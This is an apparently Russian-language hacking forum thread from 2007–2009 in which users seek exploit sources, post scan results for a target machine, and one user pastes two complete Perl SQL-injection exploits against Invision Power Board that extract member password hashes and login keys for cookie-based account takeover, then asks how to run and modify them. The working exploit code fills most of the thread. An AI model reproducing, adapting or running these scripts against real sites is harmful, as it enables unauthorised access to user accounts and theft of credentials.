Exploits
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Exploits - 2007-10-16 03:19:28.200000
|
|
|
AlexSka
Сообщений: 31
Оценки: 0
Присоединился: 2007-10-16 02:45:22.613333
|
кто какие юзает сплойты и где можно достать их исходники ? exploit ms0-411 - дает полный доступ к консоли на машине под управлением win2k XP также пробовал использовать в ИЕ ActiveX для запуска разных приложений … —————————– кто что может посоветовать ?
|
|
|
RE: Exploits - 2007-10-16 04:29:38.076666
|
|
|
furiousangel
Сообщений: 1116
Оценки: 0
Присоединился: 2005-05-28 06:31:47
|
http://milw0rm.com/ securitylab.ru обычно вначале сплоита в коментах пишут как его компилить…
|
|
|
RE: Exploits - 2007-10-16 16:45:44.036666
|
|
|
SkyLinE215
Сообщений: -986
Оценки: 0
Присоединился: 2007-08-27 10:25:44.570000
|
Здесь найдеш парочку.
|
|
|
RE: Exploits - 2007-10-16 21:29:50.866666
|
|
|
multiexe
Сообщений: 532
Оценки: 0
Присоединился: 2007-09-18 18:00:33.783333
|
Здесь глянь http://www.milw0rm.com/
|
|
|
RE: Exploits - 2007-10-22 17:09:41.623333
|
|
|
ed_gein
Сообщений: 145
Оценки: 0
Присоединился: 2006-06-30 17:32:20
|
CoreImpact Metasploit
|
|
|
RE: Exploits - 2007-11-03 07:15:38.613333
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
Юзаю два локальных сплоита 20070210-MS06-035(в паблике есть ) для ребута если открыт 445 порт , он почти у всех открыт , и LSA EXPLOIT ( в паблике есть . но я не нашёл ( ) для полного доступа через смd , особенно если открыт 1025 порт , хотя шелл порт 8357 , рульная вещь
|
|
|
RE: Exploits - 2007-11-08 00:03:43.176666
|
|
|
time2die
Сообщений: 222
Оценки: 0
Присоединился: 2007-03-16 12:14:09.526666
|
quote:
Юзаю два локальных сплоита 20070210-MS06-035 для ребута если открыт 445 порт где ты такой эксплоит нарыл?где ваше нарыть эксплоит на те ошибки которые находит XSpider?я пытался искать на milWorm но там они все как-то странно называются,и я не нашел не одного кот мне нужен был=(
|
|
|
RE: Exploits - 2007-11-08 00:24:11
|
|
|
time2die
Сообщений: 222
Оценки: 0
Присоединился: 2007-03-16 12:14:09.526666
|
например я нарыл что комп 10.145.17.16 Вероятная версия операционной системы : Windows 5.1 Сервис 123 / udp Имя сервиса : Network Time Protocol 135 / tcp Не удалось идентифицировать RPC сервис 137 / udp Имя сервиса : NetBIOS (Network Basic Input/Output System) Session Service Protocol 139 / tcp Имя сервиса : Network Basic Input/Output System ( LanManager: Windows 2000 LAN Manager OS: Windows 5.1 ) 445 / tcp Имя сервиса : Microsoft Directory Service ( Удаленное выполнение команд (ms06-040) ) 1799 / tcp Имя сервиса устанавливаемого на этом порту по умолчанию : netrisk в скоках типа ошибки,но я не могу найти эксплоиты к этим сервисам=(
|
|
|
RE: Exploits - 2007-11-08 00:26:56.236666
|
|
|
Mkey
Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
|
metasploit.com
|
|
|
RE: Exploits - 2007-11-08 16:06:40.086666
|
|
|
time2die
Сообщений: 222
Оценки: 0
Присоединился: 2007-03-16 12:14:09.526666
|
quote:
metasploit.com скинь ссылкы на метесплоите хоть на один из этих сервисов?если ты конечно за свои посты отвечаешь
|
|
|
RE: Exploits - 2007-11-08 21:53:09.063333
|
|
|
Mkey
Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
|
quote:
скинь ссылкы на метесплоите хоть на один из этих сервисов?если ты конечно за свои посты отвечаешь щас скрины сделаю для людей не желающих ваааще думать…
|
|
|
RE: Exploits - 2008-11-29 14:10:26.576666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
вот хотел выложить один ,плз посмотрите почему он не запускается мож где в нем есть ошибка плс посмотрите что тут я не правильно делаю ,просто устал ждать ,запускаю вот так c:\perl\bin\exploit.pl #!/usr/bin/perl use IO::Socket; if (@ARGV < 4) { &usage; } $server = $ARGV[0]; $path = $ARGV[1]; $member_id = $ARGV[2]; $target = $ARGV[3]; $pass = ($target)?('member_login_key'):('password'); $server =~ s!(http:\/\/)!!; $request = 'http://'; $request .= $server; $request .= $path; $s_num = 1; $|++; $n = 0; print "[~] SERVER : $server\r\n"; print "[~] PATH : $path\r\n"; print "[~] MEMBER ID : $member_id\r\n"; print "[~] TARGET : $target"; print (($target)?(' - IPB 2.*'):(' - IPB 1.*')); print "\r\n"; print "[~] RICERCA PASSWORD … [|]"; ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; while(1) { if(&found(47,58)==0) { &found(96,122); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] MEMBER ID : $member_id }; print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : ')); print $allchar."\r\n"; } else { print "\b\b Il sito e' protetto ]"; } exit(); } else { $allchar .= chr($i); } $s_num++; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D"; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*"; $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $nmalykh = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh); while(<$socket>) { if (/Set-Cookie: session_id=0;/) { return 1; } } return 0; } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub usage() { print q( Invision Power Board v < 2.0.4 SQL injection exploit —————————————————- USO: ____________________________________________________________ exploit.pl [Host] [/cartellaIPB/] [utente] [IPBversion] [server] - Host da Attaccare [/folder/] - Cartella dove è installato IPB [member_id] - Numero Utente da Attaccare targets: 0 - per versioni 1.x 1 - per versioni 2.x (Inferiore alla 2.0.4) Esempio exploit.pl http://example/index.php/forum/2.0 ); exit(); }
|
|
|
RE: Exploits - 2008-11-29 22:55:22.320000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
здесь кто -нить есть ,кому тут задавать вопросы можно? подскожите кто-нить как запустить сплоит можно ,что в этих строках нужно прописывать.я их выделил красным объясните кто может тут и другие после будут читать.. еще ,тут нужно за место 127.0.0.1 прописать адрес кого ломать ,или так остаётся все #!/usr/bin/perl use IO::Socket; # # # # # # # # # # # # # ## #### ## # ## ## ###### ## ## ## ## ###### ## ## ## ## #### ## ## ### ############ ### ######################## ############## ######## ########## ####### ### ## ########## ## ### ### ## ########## ## ### ### # ########## # ### ### ## ######## ## ### ## # ###### # ## ## # #### # ## ## ## ## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit ## by RusH security team (www.rst.void.ru) ## coded by 1dt.w0lf ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## example: ## ## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ## ———————————————————————————————— ## [>] SERVER: 127.0.0.1 ## [>] DIR: /IPB202/ ## [>] FORUM: 2 ## [>] TOPIC: 1 ## [>] SID: 38e2a2752535f5b9a2636b1e22e7bee6 ## [>] PREFIX: ## [>] ID:15956 ## ———————————————————————————————— ## ## [~] PREPARE TO CONNECT… ## [+] CONNECTED ## [~] SENDING QUERY… ## [+] DONE! ## ## PREFIX: ibf_ ## ## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_ ## ———————————————————————————————— ## [>] SERVER:127.0.0.1 ## [>] DIR: /IPB202/ ## [>] FORUM: 2 ## [>] TOPIC: 1 ## [>] SID: 38e2a2752535f5b9a2636b1e22e7bee6 ## [>] PREFIX: ibf_ ## [>] ID:15956 ## ———————————————————————————————— ## ## [~] PREPARE TO CONNECT… ## [+] CONNECTED ## [~] SENDING QUERY… ## [+] DONE! ## ## –[ REPORT ]———————————————————————————— ## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e] ## ———————————————————————————————— ## Now you need edit cookie and insert new pass_hash and member_id values. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Пару слов о возвращаемом эксплоитом результате: ## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с ## помощью которого можно войти на форум под любым юзером без ввода пароля. ## member_id это также одноименное значение из кукиса. ## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените ## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (@ARGV < 5) { print "————————————————————————-\r\n"; print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n"; print "————————————————————————-\r\n"; print "usage:\r\n"; print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n"; print "SERVER - server where IPB installed\r\n"; print "/DIR/ - IPB directory or / for no directory\r\n"; print "FORUM_NUM - number of existing forum\r\n"; print "TOPIC_NUM - number of existing topic\r\n"; print "SID - your session id\r\n"; print "[TABLE_PREFIX] - table prefix in database\r\n"; print "[USER_ID] - user id for exploiting\r\n\r\n"; print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_\r\n"; print "————————————————————————-\r\n"; exit(); } if (@ARGV < 6) { $get_table = 1; } $server = $ARGV[0]; $dir = $ARGV[1]; $fnum = $ARGV[2]; $tnum = $ARGV[3]; $sid = $ARGV[4]; $prefix = $ARGV[5]; $id = $ARGV[6]; print "————————————————————————————————\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] FORUM: $fnum\r\n"; print "[>] TOPIC: $tnum\r\n"; print "[>] SID: $sid\r\n"; print "[>] PREFIX: $prefix\r\n"; print "[>] ID: $id\r\n"; print "————————————————————————————————\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "index.php?s="; $path .= $sid; $path .= "&act=Post&CODE=02&f="; $path .= $fnum; $path .= "&t="; $path .= $tnum; if ($get_table == 1) { $path .= "&qpid=r57" } else { $path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20"; $path .= $prefix; $path .= "members"; $path .= ($id)?("%20WHERE%20id=$id%20"):("%20"); $path .= "/*"; } print "[~] PREPARE TO CONNECT…\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY…\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; $suc =0; if ($get_table == 1) { while ($answer = <$socket>) { if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; } } if (!$suc) { print "Exploit failed\r\n"; } exit(); } print "–[ REPORT ]————————————————————————————\r\n"; while ($answer = <$socket>) { if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; } } print "————————————————————————————————\r\n"; if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); } else { print "Exploit failed\r\n"; } # milw0rm.com [2004-11-22]
|
|
|
RE: Exploits - 2008-12-25 03:15:48.166666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
значет отвечу сам как думаю ,запускать нужно так c:\Perl\bin\r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf,так новерно будет верней ,ну конечно я увидел разницу в запуске между вистой и xp. сплоит для версси v2.0.0 - 2.0.2 ::::: где c:\Perl\bin\-это путь к папкам где лежит сплоит ::::: r57ipb.pl-сам файл(название файла) ::::: /IPB202/-Директория(IPB directory or / for no directory) :::::::: 2-forum 1-Topik :::::: 38e2a2752535f5b9a2636b1e22e7bee6 ibf -тут наши куки запуск производил на висте … 2) ну и хотел сразу зaдать пару вопросов .я так понял эта строка и делает injection могу -ли сам вписать свою произвольную команду injection в сплоите(тойсть переделать вставить свое) $path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
|
|
|
RE: Exploits - 2009-10-21 12:53:26.686666
|
|
|
Tester_Egor4ik
Сообщений: 161
Оценки: 0
Присоединился: 2009-10-15 15:45:32.776666
|
к своему стыду не один сплойт у меня не сделал своего дела(которые я сам собирал)
|
|
|
|
|